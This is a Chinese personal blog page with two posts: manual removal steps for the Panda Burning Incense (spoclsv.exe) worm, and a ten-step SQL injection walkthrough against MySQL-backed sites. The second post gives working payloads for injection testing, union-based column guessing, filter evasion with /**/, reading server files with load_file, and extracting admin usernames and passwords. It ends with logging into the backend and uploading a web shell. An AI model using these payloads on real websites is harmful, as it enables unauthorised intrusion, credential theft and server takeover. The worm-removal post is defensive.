Tags:步骤 - 我爱贝贝 - 金东浩官方网站 - welcome to old.bbmy.net
分页: 1/1 第一页 1 最后页 [ 金东浩博客显示模式: 摘要 | 列表 ]
07-0107-01 25
查看金东浩手工清除熊猫烧香的步骤照片
今天老婆的机子也中熊猫烧香了,就是因为一个不小心,U盘刚插上就点击,这样不中才怪了,本来以为三两下可以搞定,没想到,搞了一下午时间,唉,总结一下,给大家提供手工杀步骤:
在网上发现《四招彻底防御所有感染EXE文件的病毒》和防范熊猫烧香2000,XP的补丁提供给大家

四招彻底防御所有感染EXE文件的病毒
本日记包含有下载文件,请点击下面连接下载
这个文件只能在登入之后下载。请先 注册登入

xp熊猫烧香安全补订
本日记包含有下载文件,请点击下面连接下载
这个文件只能在登入之后下载。请先 注册登入

2000熊猫烧香安全补订
本日记包含有下载文件,请点击下面连接下载
这个文件只能在登入之后下载。请先 注册登入

熊猫烧香变种spoclsv.exe查杀
1. 断开网络(必须断开)
2. 结束病毒进程
%System%\drivers\spoclsv.exe
3. 删除病毒文件:
c:\windows\system32\drivers\spoclsv.exe
注意:打开所有本地磁盘都要右键打开,以免再次中毒,重头再来!
4. 修改注册表设置,恢复“显示所有文件和文件夹”选项功能:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001
如果你不会的话,就下载下面的压缩包,里面自带了显示所有文件和文件夹的注册表文件
5. 右键点击分区盘符,点击右键菜单中的“打开”进入分区根目录,删除根目录下的文件:
X:\setup.exe
X:\autorun.inf
6. 删除病毒创建的启动项:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svcshare"="%System%\drivers\spoclsv.exe"
7. 使用专杀工具进行全盘扫描,清除恢复被感染的exe文件
本日记包含有下载文件,请点击下面连接下载
这个文件只能在登入之后下载。请先 注册登入

下载的压缩包中包括多种“熊猫烧香病毒”专杀工具。

金东浩日记Tags: , , ,
06-1206-12 31
1.判断是否存在注入,加';and 1=1;and 1=2
2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询
3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10
4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替。
5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0 /*如果结果返回错误,那我们只能猜解管理员帐号和密码了。
6.如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。
7.首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6.... from user /* 如果返回正常,说明存在这个表。
8.知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6.... from user/*如果在2字段显示出字段内容则存在些字段。
9.同理再猜解password字段,猜解成功再找后台登录。
10.登录后台,上传shell。
金东浩日记Tags: , ,
分页: 1/1 第一页 1 最后页 [ 金东浩博客显示模式: 摘要 | 列表 ]